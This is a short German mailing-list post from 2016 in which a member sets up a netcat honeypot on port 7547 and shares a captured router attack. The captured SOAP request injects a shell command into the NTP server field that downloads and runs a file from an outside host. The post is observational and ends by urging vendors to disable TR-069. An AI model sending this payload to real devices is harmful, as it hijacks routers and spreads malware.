Telekom-Attacke
kpanic at ff3l.net
kpanic at ff3l.net
Di Nov 29 10:00:01 CET 2016
Hehe...
Ich habe mal einen kleinen Honeypot mit Netcat gebaut... Ergebnis nach
wenigen Sekunden:
root at gw9 ~ # iptables -I INPUT -p tcp -m tcp --dport 7547 -j ACCEPT
root at gw9 ~ # nc -l -p 7547
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519
<?xml version="1.0"?><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body> <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd
/tmp;wget http://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5>
</u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
C
Es wird Zeit, dass die Routerhersteller ihre Geräte mit deaktiviertem
TR-069 ausliefern...
Gruß
David
Mehr Informationen über die Mailingliste ff3l